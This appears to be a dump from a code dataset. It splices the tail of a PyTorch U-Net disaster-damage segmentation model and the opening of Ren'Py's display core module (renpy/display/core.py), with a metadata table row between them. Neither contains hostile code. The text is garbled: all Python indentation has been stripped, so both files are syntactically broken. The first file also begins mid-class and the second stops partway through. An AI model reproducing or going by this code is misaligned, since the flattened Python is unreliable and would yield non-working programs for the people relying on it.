def __init__(self, in_channels, middle_channels, out_channels):
super().__init__()
self.layer = nn.Sequential(
nn.Upsample(scale_factor=2), nn.Conv2d(in_channels, out_channels, 3, padding=1), nn.ReLU(inplace=True)
)
def forward(self, x):
return self.layer(x)
class UNetDecoderV2(DecoderModule):
def __init__(
self,
feature_maps: List[int],
decoder_features: List[int],
mask_channels: int,
last_upsample_filters=None,
dropout=0.0,
abn_block=ABN,
):
super().__init__()
if not isinstance(decoder_features, list):
decoder_features = [decoder_features * (2 ** i) for i in range(len(feature_maps))]
if last_upsample_filters is None:
last_upsample_filters = decoder_features[0]
self.encoder_features = feature_maps
self.decoder_features = decoder_features
self.decoder_stages = nn.ModuleList([self.get_decoder(idx) for idx in range(0, len(self.decoder_features))])
self.bottlenecks = nn.ModuleList(
[
ConvBottleneck(self.encoder_features[-i - 2] + f, f)
for i, f in enumerate(reversed(self.decoder_features[:]))
]
)
self.output_filters = decoder_features
self.last_upsample = UnetDecoderBlock(decoder_features[0], last_upsample_filters, last_upsample_filters)
self.final = nn.Conv2d(last_upsample_filters, mask_channels, kernel_size=1)
def get_decoder(self, layer):
in_channels = (
self.encoder_features[layer + 1]
if layer + 1 == len(self.decoder_features)
else self.decoder_features[layer + 1]
)
return UnetDecoderBlock(in_channels, self.decoder_features[layer], self.decoder_features[max(layer, 0)])
def forward(self, feature_maps):
last_dec_out = feature_maps[-1]
x = last_dec_out
for idx, bottleneck in enumerate(self.bottlenecks):
rev_idx = -(idx + 1)
decoder = self.decoder_stages[rev_idx]
x = decoder(x)
x = bottleneck(x, feature_maps[rev_idx - 1])
x = self.last_upsample(x)
f = self.final(x)
return f
class UnetV2SegmentationModel(nn.Module):
def __init__(
self,
encoder: EncoderModule,
num_classes: int,
disaster_type_classes: int,
damage_type_classes: int,
unet_channels: List[int],
dropout=0.25,
abn_block: Union[ABN, Callable[[int], nn.Module]] = ABN,
full_size_mask=True,
):
super().__init__()
self.encoder = encoder
feature_maps = [2 * fm for fm in encoder.output_filters]
self.decoder = UNetDecoderV2(
feature_maps=feature_maps,
decoder_features=unet_channels,
mask_channels=num_classes,
dropout=dropout,
abn_block=abn_block,
)
self.full_size_mask = full_size_mask
if disaster_type_classes is not None:
self.disaster_type_classifier = disaster_type_classifier(
feature_maps[-1], disaster_type_classes, dropout=dropout
)
else:
self.disaster_type_classifier = None
if damage_type_classes is not None:
self.damage_types_classifier = damage_types_classifier(
feature_maps[-1], damage_type_classes, dropout=dropout
)
else:
self.damage_types_classifier = None
def forward(self, x):
batch_size = x.size(0)
pre, post = x[:, 0:3, ...], x[:, 3:6, ...]
if self.training:
x = torch.cat([pre, post], dim=0)
features = self.encoder(x)
features = [torch.cat([f[0:batch_size], f[batch_size : batch_size * 2]], dim=1) for f in features]
else:
pre_features, post_features = self.encoder(pre), self.encoder(post)
features = [torch.cat([pre, post], dim=1) for pre, post in zip(pre_features, post_features)]
mask = self.decoder(features)
if self.full_size_mask:
mask = F.interpolate(mask, size=x.size()[2:], mode="bilinear", align_corners=False)
output = {OUTPUT_MASK_KEY: mask}
if self.disaster_type_classifier is not None:
disaster_type = self.disaster_type_classifier(features[-1])
output[DISASTER_TYPE_KEY] = disaster_type
if self.damage_types_classifier is not None:
damage_types = self.damage_types_classifier(features[-1])
output[DAMAGE_TYPE_KEY] = damage_types
return output
def efficientb3_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.EfficientNetB3Encoder(pretrained=pretrained,
layers=[0, 1, 2, 4, 6],
abn_params={"activation": ACT_RELU})
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[64, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def densenet121_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.DenseNet121Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[64, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def densenet169_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.DenseNet169Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[128, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def resnet18_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.Resnet18Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[64, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def resnet34_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.Resnet34Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[64, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def resnet50_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.Resnet50Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[96, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def resnet101_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.Resnet101Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[64, 128, 256, 384],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def seresnext50_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.SEResNeXt50Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[64, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def seresnext101_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.SEResNeXt101Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[128, 128, 256, 384],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
| true | true |
f72ecbbcaf235e8b00e8f6b45bc705145e916d73 | 107,466 | py | Python | TEST_PROJET-1.0-pc/renpy/display/core.py | Dune0lyn/otome | e365b474e7df3f76ccc0853fd1665f6529a59304 | [
"CC0-1.0"
] | null | null | null | TEST_PROJET-1.0-pc/renpy/display/core.py | Dune0lyn/otome | e365b474e7df3f76ccc0853fd1665f6529a59304 | [
"CC0-1.0"
] | null | null | null | TEST_PROJET-1.0-pc/renpy/display/core.py | Dune0lyn/otome | e365b474e7df3f76ccc0853fd1665f6529a59304 | [
"CC0-1.0"
] | null | null | null | # Copyright 2004-2019 Tom Rothamel <pytom@bishoujo.us>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# This file contains code for initializing and managing the display
# window.
from __future__ import print_function
import renpy.display
import renpy.audio
import renpy.text
import renpy.test
import pygame_sdl2 as pygame
import sys
import os
import time
import cStringIO
import threading
import copy
import gc
import inspect
import_time = time.time()
try:
import android # @UnresolvedImport
except:
android = None
TIMEEVENT = pygame.event.register("TIMEEVENT")
PERIODIC = pygame.event.register("PERIODIC")
REDRAW = pygame.event.register("REDRAW")
EVENTNAME = pygame.event.register("EVENTNAME")
# All events except for TIMEEVENT and REDRAW
ALL_EVENTS = set(pygame.event.get_standard_events()) # @UndefinedVariable
ALL_EVENTS.add(PERIODIC)
ALL_EVENTS.add(EVENTNAME)
enabled_events = {
pygame.QUIT,
pygame.APP_TERMINATING,
pygame.APP_LOWMEMORY,
pygame.APP_WILLENTERBACKGROUND,
pygame.APP_DIDENTERBACKGROUND,
pygame.APP_WILLENTERFOREGROUND,
pygame.APP_DIDENTERFOREGROUND,
pygame.WINDOWEVENT,
pygame.SYSWMEVENT,
pygame.KEYDOWN,
pygame.KEYUP,
pygame.TEXTEDITING,
pygame.TEXTINPUT,
pygame.MOUSEMOTION,
pygame.MOUSEBUTTONDOWN,
pygame.MOUSEBUTTONUP,
pygame.MOUSEWHEEL,
pygame.JOYAXISMOTION,
pygame.JOYHATMOTION,
pygame.JOYBALLMOTION,
pygame.JOYBUTTONDOWN,
pygame.JOYBUTTONUP,
pygame.JOYDEVICEADDED,
pygame.JOYDEVICEREMOVED,
pygame.CONTROLLERAXISMOTION,
pygame.CONTROLLERBUTTONDOWN,
pygame.CONTROLLERBUTTONUP,
pygame.CONTROLLERDEVICEADDED,
pygame.CONTROLLERDEVICEREMOVED,
pygame.RENDER_TARGETS_RESET,
TIMEEVENT,
PERIODIC,
REDRAW,
EVENTNAME,
}
# The number of msec between periodic events.
PERIODIC_INTERVAL = 50
# Time management.
time_base = 0.0
time_mult = 1.0
def init_time():
warp = os.environ.get("RENPY_TIMEWARP", "1.0")
global time_base
global time_mult
time_base = time.time()
time_mult = float(warp)
def get_time():
t = time.time()
return time_base + (t - time_base) * time_mult
def displayable_by_tag(layer, tag):
"""
Get the displayable on the given layer with the given tag.
"""
return renpy.game.context().scene_lists.get_displayable_by_tag(layer, tag)
class IgnoreEvent(Exception):
"""
Exception that is raised when we want to ignore an event, but
also don't want to return anything.
"""
pass
class EndInteraction(Exception):
"""
Exception that can be raised (for example, during the render method of
a displayable) to end the current interaction immediately.
"""
def __init__(self, value):
self.value = value
class absolute(float):
"""
This represents an absolute float coordinate.
"""
__slots__ = [ ]
def place(width, height, sw, sh, placement):
"""
Performs the Ren'Py placement algorithm.
`width`, `height`
The width and height of the area the image will be
placed in.
`size`
The size of the image to be placed.
`placement`
The tuple returned by Displayable.get_placement().
"""
xpos, ypos, xanchor, yanchor, xoffset, yoffset, _subpixel = placement
if xpos is None:
xpos = 0
if ypos is None:
ypos = 0
if xanchor is None:
xanchor = 0
if yanchor is None:
yanchor = 0
if xoffset is None:
xoffset = 0
if yoffset is None:
yoffset = 0
# We need to use type, since isinstance(absolute(0), float).
if xpos.__class__ is float:
xpos *= width
if xanchor.__class__ is float:
xanchor *= sw
x = xpos + xoffset - xanchor
if ypos.__class__ is float:
ypos *= height
if yanchor.__class__ is float:
yanchor *= sh
y = ypos + yoffset - yanchor
return x, y
class DisplayableArguments(renpy.object.Object):
"""
Represents a set of arguments that can be passed to a duplicated
displayable.
"""
# The name of the displayable without any arguments.
name = ()
# Arguments supplied.
args = ()
# The style prefix in play. This is used by DynamicImage to figure
# out the prefix list to apply.
prefix = None
# True if lint is in use.
lint = False
def copy(self, **kwargs):
"""
Returns a copy of this object with the various fields set to the
values they were given in kwargs.
"""
rv = DisplayableArguments()
rv.__dict__.update(self.__dict__)
rv.__dict__.update(kwargs)
return rv
def extraneous(self):
if renpy.config.developer and renpy.config.report_extraneous_attributes:
raise Exception("Image '{}' does not accept attributes '{}'.".format(
" ".join(self.name),
" ".join(self.args),
))
default_style = renpy.style.Style("default")
class Displayable(renpy.object.Object):
"""
The base class for every object in Ren'Py that can be
displayed to the screen.
Drawables will be serialized to a savegame file. Therefore, they
shouldn't store non-serializable things (like pygame surfaces) in
their fields.
"""
# Some invariants about method call order:
#
# per_interact is called before render.
# render is called before event.
#
# get_placement can be called at any time, so can't
# assume anything.
# If True this displayable can accept focus.
# If False, it can't, but it keeps its place in the focus order.
# If None, it does not have a place in the focus order.
focusable = None
# This is the focus named assigned by the focus code.
full_focus_name = None
# A role ('selected_' or '' that prefixes the style).
role = ''
# The event we'll pass on to our parent transform.
transform_event = None
# Can we change our look in response to transform_events?
transform_event_responder = False
# The main displayable, if this displayable is the root of a composite
# displayable. (This is used by SL to figure out where to add children
# to.) If None, it is itself.
_main = None
# A list of the children that make up this composite displayable.
_composite_parts = [ ]
# The location the displayable was created at, if known.
_location = None
# Does this displayable use the scope?
_uses_scope = False
# Arguments supplied to this displayable.
_args = DisplayableArguments()
# Set to true of the displayable is duplicatable (has a non-trivial
# duplicate method), or one of its children is.
_duplicatable = False
# Does this displayable require clipping?
_clipping = False
# Does this displayable have a tooltip?
_tooltip = None
def __ne__(self, o):
return not (self == o)
def __init__(self, focus=None, default=False, style='default', _args=None, tooltip=None, default_focus=False, **properties):
global default_style
if (style == "default") and (not properties):
self.style = default_style
else:
self.style = renpy.style.Style(style, properties) # @UndefinedVariable
self.focus_name = focus
self.default = default or default_focus
self._tooltip = tooltip
if _args is not None:
self._args = _args
def _copy(self, args=None):
"""
Makes a shallow copy of the displayable. If `args` is provided,
replaces the arguments with the stored copy.
"""
rv = copy.copy(self)
if args is not None:
rv._args = args
return rv
def _duplicate(self, args):
"""
Makes a duplicate copy of the following kids of displayables:
* Displayables that can accept arguments.
* Displayables that maintain state that should be reset before being
shown to the user.
* Containers that contain (including transitively) one of the other
kinds of displayables.
Displayables that contain state that can be manipulated by the user
are never copied.
This should call _unique on children that have been copied before
setting its own _duplicatable flag.
"""
if args and args.args:
args.extraneous()
return self
def _get_tooltip(self):
"""
Returns the tooltip of this displayable.
"""
return self._tooltip
def _in_current_store(self):
"""
Returns a version of this displayable that will not change as it is
rendered.
"""
return self
def _unique(self):
"""
This is called when a displayable is "born" unique, which occurs
when there is only a single reference to it. What it does is to
manage the _duplicatable flag - setting it false unless one of
the displayable's children happens to be duplicatable.
"""
return
def parameterize(self, name, parameters):
"""
Obsolete alias for _duplicate.
"""
a = self._args.copy(name=name, args=parameters)
return self._duplicate(a)
def _equals(self, o):
"""
This is a utility method that can be called by a Displayable's
__eq__ method, to compare displayables for type and displayable
component equality.
"""
if type(self) is not type(o):
return False
if self.focus_name != o.focus_name:
return False
if self.style != o.style:
return False
if self.default != o.default:
return False
return True
def __unicode__(self):
return self.__class__.__name__
def __repr__(self):
return "<{} at {:x}>".format(unicode(self).encode("utf-8"), id(self))
def find_focusable(self, callback, focus_name):
focus_name = self.focus_name or focus_name
if self.focusable:
callback(self, focus_name)
elif self.focusable is not None:
callback(None, focus_name)
for i in self.visit():
if i is None:
continue
i.find_focusable(callback, focus_name)
def focus(self, default=False):
"""
Called to indicate that this widget has the focus.
"""
self.set_style_prefix(self.role + "hover_", True)
if not default:
renpy.exports.play(self.style.hover_sound)
def unfocus(self, default=False):
"""
Called to indicate that this widget has become unfocused.
"""
self.set_style_prefix(self.role + "idle_", True)
def is_focused(self):
if renpy.display.focus.grab and renpy.display.focus.grab is not self:
return
return renpy.game.context().scene_lists.focused is self
def set_style_prefix(self, prefix, root):
"""
Called to set the style prefix of this widget and its child
widgets, if any.
`root` - True if this is the root of a style tree, False if this
has been passed on to a child.
"""
if prefix == self.style.prefix:
return
self.style.set_prefix(prefix)
renpy.display.render.redraw(self, 0)
def render(self, width, height, st, at):
"""
Called to display this displayable. This is called with width
and height parameters, which give the largest width and height
that this drawable can be drawn to without overflowing some
bounding box. It's also given two times. It returns a Surface
that is the current image of this drawable.
@param st: The time since this widget was first shown, in seconds.
@param at: The time since a similarly named widget was first shown,
in seconds.
"""
raise Exception("Render not implemented.")
def event(self, ev, x, y, st):
"""
Called to report than an event has occured. Ev is the raw
pygame event object representing that event. If the event
involves the mouse, x and y are the translation of the event
into the coordinates of this displayable. st is the time this
widget has been shown for.
@returns A value that should be returned from Interact, or None if
no value is appropriate.
"""
return None
def get_placement(self):
"""
Returns a style object containing placement information for
this Displayable. Children are expected to overload this
to return something more sensible.
"""
return self.style.get_placement()
def visit_all(self, callback, seen=None):
"""
Calls the callback on this displayable, and then on all children
of this displayable.
"""
if seen is None:
seen = set()
for d in self.visit():
if d is None:
continue
id_d = id(d)
if id_d in seen:
continue
seen.add(id_d)
d.visit_all(callback, seen)
callback(self)
def visit(self):
"""
Called to ask the displayable to return a list of its children
(including children taken from styles). For convenience, this
list may also include None values.
"""
return [ ]
def per_interact(self):
"""
Called once per widget per interaction.
"""
return None
def predict_one(self):
"""
Called to ask this displayable to call the callback with all
the images it may want to load.
"""
return
def predict_one_action(self):
"""
Called to ask this displayable to cause image prediction
to occur for images that may be loaded by its actions.
"""
return
def place(self, dest, x, y, width, height, surf, main=True):
"""
This places a render (which must be of this displayable)
within a bounding area. Returns an (x, y) tuple giving the location
the displayable was placed at.
`dest`
If not None, the `surf` will be blitted to `dest` at the
computed coordinates.
`x`, `y`, `width`, `height`
The bounding area.
`surf`
The render to place.
`main`
This is passed to Render.blit().
"""
placement = self.get_placement()
subpixel = placement[6]
xpos, ypos = place(width, height, surf.width, surf.height, placement)
xpos += x
ypos += y
pos = (xpos, ypos)
if dest is not None:
if subpixel:
dest.subpixel_blit(surf, pos, main, main, None)
else:
dest.blit(surf, pos, main, main, None)
return pos
def set_transform_event(self, event):
"""
Sets the transform event of this displayable to event.
"""
if event == self.transform_event:
return
self.transform_event = event
if self.transform_event_responder:
renpy.display.render.redraw(self, 0)
def _handles_event(self, event):
"""
Returns True if the displayable handles event, False otherwise.
"""
return False
def _hide(self, st, at, kind):
"""
Returns None if this displayable is ready to be hidden, or
a replacement displayable if it doesn't want to be hidden
quite yet. Kind is either "hide" or "replaced".
"""
return None
def _show(self):
"""
Called when the displayable is added to a scene list.
"""
def _target(self):
"""
If this displayable is part of a chain of one or more references,
returns the ultimate target of those references. Otherwise, returns
the displayable.
"""
return self
def _change_transform_child(self, child):
"""
If this is a transform, makes a copy of the transform and sets
the child of the innermost transform to this. Otherwise,
simply returns child.
"""
return child
def _clear(self):
"""
Clears out the children of this displayable, if any.
"""
return
def _tts_common(self, default_alt=None):
rv = [ ]
for i in self.visit():
if i is not None:
speech = i._tts()
if speech.strip():
rv.append(speech)
rv = ": ".join(rv)
rv = rv.replace("::", ":")
rv = rv.replace(": :", ":")
alt = self.style.alt
if alt is None:
alt = default_alt
if alt is not None:
rv = renpy.substitutions.substitute(alt, scope={ "text" : rv })[0]
return rv
def _tts(self):
"""
Returns the self-voicing text of this displayable and all of its
children that cannot take focus. If the displayable can take focus,
returns the empty string.
"""
return self._tts_common()
def _tts_all(self):
"""
Returns the self-voicing text of this displayable and all of its
children that cannot take focus.
"""
return self._tts_common()
class SceneListEntry(renpy.object.Object):
"""
Represents a scene list entry. Since this was replacing a tuple,
it should be treated as immutable after its initial creation.
"""
def __init__(self, tag, zorder, show_time, animation_time, displayable, name):
self.tag = tag
self.zorder = zorder
self.show_time = show_time
self.animation_time = animation_time
self.displayable = displayable
self.name = name
def __iter__(self):
return iter((self.tag, self.zorder, self.show_time, self.animation_time, self.displayable))
def __getitem__(self, index):
return (self.tag, self.zorder, self.show_time, self.animation_time, self.displayable)[index]
def __repr__(self):
return "<SLE: %r %r %r>" % (self.tag, self.name, self.displayable)
def copy(self):
return SceneListEntry(
self.tag,
self.zorder,
self.show_time,
self.animation_time,
self.displayable,
self.name)
def update_time(self, time):
rv = self
if self.show_time is None or self.animation_time is None:
rv = self.copy()
rv.show_time = rv.show_time or time
rv.animation_time = rv.animation_time or time
return rv
class SceneLists(renpy.object.Object):
"""
This stores the current scene lists that are being used to display
things to the user.
"""
__version__ = 7
def after_setstate(self):
for i in renpy.config.layers + renpy.config.top_layers:
if i not in self.layers:
self.layers[i] = [ ]
self.at_list[i] = { }
self.layer_at_list[i] = (None, [ ])
def after_upgrade(self, version):
if version < 1:
self.at_list = { }
self.layer_at_list = { }
for i in renpy.config.layers + renpy.config.top_layers:
self.at_list[i] = { }
self.layer_at_list[i] = (None, [ ])
if version < 3:
self.shown_window = False
if version < 4:
for k in self.layers:
self.layers[k] = [ SceneListEntry(*(i + (None,)) ) for i in self.layers[k] ]
self.additional_transient = [ ]
if version < 5:
self.drag_group = None
if version < 6:
self.shown = self.image_predict_info
if version < 7:
self.layer_transform = { }
def __init__(self, oldsl, shown):
super(SceneLists, self).__init__()
# Has a window been shown as part of these scene lists?
self.shown_window = False
# A map from layer name -> list(SceneListEntry)
self.layers = { }
# A map from layer name -> tag -> at_list associated with that tag.
self.at_list = { }
# A map from layer to (star time, at_list), where the at list has
# been applied to the layer as a whole.
self.layer_at_list = { }
# The current shown images,
self.shown = shown
# A list of (layer, tag) pairs that are considered to be
# transient.
self.additional_transient = [ ]
# Either None, or a DragGroup that's used as the default for
# drags with names.
self.drag_group = None
# A map from a layer to the transform that applies to that
# layer.
self.layer_transform = { }
if oldsl:
for i in renpy.config.layers + renpy.config.top_layers:
try:
self.layers[i] = oldsl.layers[i][:]
except KeyError:
self.layers[i] = [ ]
if i in oldsl.at_list:
self.at_list[i] = oldsl.at_list[i].copy()
self.layer_at_list[i] = oldsl.layer_at_list[i]
else:
self.at_list[i] = { }
self.layer_at_list[i] = (None, [ ])
for i in renpy.config.overlay_layers:
self.clear(i)
self.replace_transient(prefix=None)
self.focused = None
self.drag_group = oldsl.drag_group
self.layer_transform.update(oldsl.layer_transform)
else:
for i in renpy.config.layers + renpy.config.top_layers:
self.layers[i] = [ ]
self.at_list[i] = { }
self.layer_at_list[i] = (None, [ ])
self.music = None
self.focused = None
def replace_transient(self, prefix="hide"):
"""
Replaces the contents of the transient display list with
a copy of the master display list. This is used after a
scene is displayed to get rid of transitions and interface
elements.
`prefix`
The prefix/event to use. Set this to None to prevent the hide
from happening.
"""
for i in renpy.config.transient_layers:
self.clear(i, True)
for layer, tag in self.additional_transient:
self.remove(layer, tag, prefix=prefix)
self.additional_transient = [ ]
def transient_is_empty(self):
"""
This returns True if all transient layers are empty. This is
used by the rollback code, as we can't start a new rollback
if there is something in a transient layer (as things in the
transient layer may contain objects that cannot be pickled,
like lambdas.)
"""
for i in renpy.config.transient_layers:
if self.layers[i]:
return False
return True
def transform_state(self, old_thing, new_thing, execution=False):
"""
If the old thing is a transform, then move the state of that transform
to the new thing.
"""
if old_thing is None:
return new_thing
# Don't bother wrapping screens, as they can't be transformed.
if isinstance(new_thing, renpy.display.screen.ScreenDisplayable):
return new_thing
if renpy.config.take_state_from_target:
old_transform = old_thing._target()
else:
old_transform = old_thing
if not isinstance(old_transform, renpy.display.motion.Transform):
return new_thing
if renpy.config.take_state_from_target:
new_transform = new_thing._target()
else:
new_transform = new_thing
if not isinstance(new_transform, renpy.display.motion.Transform):
new_thing = new_transform = renpy.display.motion.Transform(child=new_thing)
new_transform.take_state(old_transform)
if execution:
new_transform.take_execution_state(old_transform)
return new_thing
def find_index(self, layer, tag, zorder, behind):
"""
This finds the spot in the named layer where we should insert the
displayable. It returns two things: an index at which the new thing
should be added, and an index at which the old thing should be hidden.
(Note that the indexes are relative to the current state of the list,
which may change on an add or remove.)
"""
add_index = None
remove_index = None
for i, sle in enumerate(self.layers[layer]):
if remove_index is None:
if (sle.tag and sle.tag == tag) or sle.displayable == tag:
remove_index = i
if zorder is None:
zorder = sle.zorder
if zorder is None:
zorder = renpy.config.tag_zorder.get(tag, 0)
for i, sle in enumerate(self.layers[layer]):
if add_index is None:
if sle.zorder == zorder:
if sle.tag and (sle.tag == tag or sle.tag in behind):
add_index = i
elif sle.zorder > zorder:
add_index = i
if add_index is None:
add_index = len(self.layers[layer])
return add_index, remove_index, zorder
def add(self,
layer,
thing,
key=None,
zorder=0,
behind=[ ],
at_list=[ ],
name=None,
atl=None,
default_transform=None,
transient=False,
keep_st=False):
"""
Adds something to this scene list. Some of these names are quite a bit
out of date.
`thing` - The displayable to add.
`key` - A string giving the tag associated with this thing.
`zorder` - Where to place this thing in the zorder, an integer
A greater value means closer to the user.
`behind` - A list of tags to place the thing behind.
`at_list` - The at_list associated with this
displayable. Counterintunitively, this is not actually
applied, but merely stored for future use.
`name` - The full name of the image being displayed. This is used for
image lookup.
`atl` - If not None, an atl block applied to the thing. (This actually is
applied here.)
`default_transform` - The default transform that is used to initialized
the values in the other transforms.
`keep_st`
If true, we preserve the shown time of a replaced displayable.
"""
if not isinstance(thing, Displayable):
raise Exception("Attempting to show something that isn't a displayable:" + repr(thing))
if layer not in self.layers:
raise Exception("Trying to add something to non-existent layer '%s'." % layer)
if key:
self.remove_hide_replaced(layer, key)
self.at_list[layer][key] = at_list
if key and name:
self.shown.predict_show(layer, name)
if transient:
self.additional_transient.append((layer, key))
l = self.layers[layer]
if atl:
thing = renpy.display.motion.ATLTransform(atl, child=thing)
add_index, remove_index, zorder = self.find_index(layer, key, zorder, behind)
at = None
st = None
if remove_index is not None:
sle = l[remove_index]
old = sle.displayable
at = sle.animation_time
if keep_st:
st = sle.show_time
if (not atl and
not at_list and
renpy.config.keep_running_transform and
isinstance(old, renpy.display.motion.Transform)):
thing = sle.displayable._change_transform_child(thing)
else:
thing = self.transform_state(l[remove_index].displayable, thing)
thing.set_transform_event("replace")
thing._show()
else:
if not isinstance(thing, renpy.display.motion.Transform):
thing = self.transform_state(default_transform, thing)
thing.set_transform_event("show")
thing._show()
sle = SceneListEntry(key, zorder, st, at, thing, name)
l.insert(add_index, sle)
if remove_index is not None:
if add_index <= remove_index:
remove_index += 1
self.hide_or_replace(layer, remove_index, "replaced")
def hide_or_replace(self, layer, index, prefix):
"""
Hides or replaces the scene list entry at the given
index. `prefix` is a prefix that is used if the entry
decides it doesn't want to be hidden quite yet.
"""
if index is None:
return
l = self.layers[layer]
oldsle = l[index]
now = get_time()
st = oldsle.show_time or now
at = oldsle.animation_time or now
if renpy.config.fast_unhandled_event:
if not oldsle.displayable._handles_event(prefix):
prefix = None
if (prefix is not None) and oldsle.tag:
d = oldsle.displayable._hide(now - st, now - at, prefix)
# _hide can mutate the layers, so we need to recompute
# index.
index = l.index(oldsle)
if d is not None:
sle = SceneListEntry(
prefix + "$" + oldsle.tag,
oldsle.zorder,
st,
at,
d,
None)
l[index] = sle
return
l.pop(index)
def get_all_displayables(self):
"""
Gets all displayables reachable from this scene list.
"""
rv = [ ]
for l in self.layers.itervalues():
for sle in l:
rv.append(sle.displayable)
return rv
def remove_above(self, layer, thing):
"""
Removes everything on the layer that is closer to the user
than thing, which may be either a tag or a displayable. Thing must
be displayed, or everything will be removed.
"""
for i in reversed(xrange(len(self.layers[layer]))):
sle = self.layers[layer][i]
if thing:
if sle.tag == thing or sle.displayable == thing:
break
if sle.tag and "$" in sle.tag:
continue
self.hide_or_replace(layer, i, "hide")
def remove(self, layer, thing, prefix="hide"):
"""
Thing is either a key or a displayable. This iterates through the
named layer, searching for entries matching the thing.
When they are found, they are removed from the displaylist.
It's not an error to remove something that isn't in the layer in
the first place.
"""
if layer not in self.layers:
raise Exception("Trying to remove something from non-existent layer '%s'." % layer)
_add_index, remove_index, _zorder = self.find_index(layer, thing, 0, [ ])
if remove_index is not None:
tag = self.layers[layer][remove_index].tag
if tag:
self.shown.predict_hide(layer, (tag,))
self.at_list[layer].pop(tag, None)
self.hide_or_replace(layer, remove_index, prefix)
def clear(self, layer, hide=False):
"""
Clears the named layer, making it empty.
If hide is True, then objects are hidden. Otherwise, they are
totally wiped out.
"""
if layer not in self.layers:
return
if not hide:
self.layers[layer] = [ ]
else:
# Have to iterate in reverse order, since otherwise
# the indexes might change.
for i in reversed(xrange(len(self.layers[layer]))):
self.hide_or_replace(layer, i, hide)
self.at_list[layer].clear()
self.shown.predict_scene(layer)
self.layer_at_list[layer] = (None, [ ])
def set_layer_at_list(self, layer, at_list, reset=True):
self.layer_at_list[layer] = (None, list(at_list))
if reset:
self.layer_transform[layer] = None
def set_times(self, time):
"""
This finds entries with a time of None, and replaces that
time with the given time.
"""
for l, (t, list) in self.layer_at_list.items(): # @ReservedAssignment
self.layer_at_list[l] = (t or time, list)
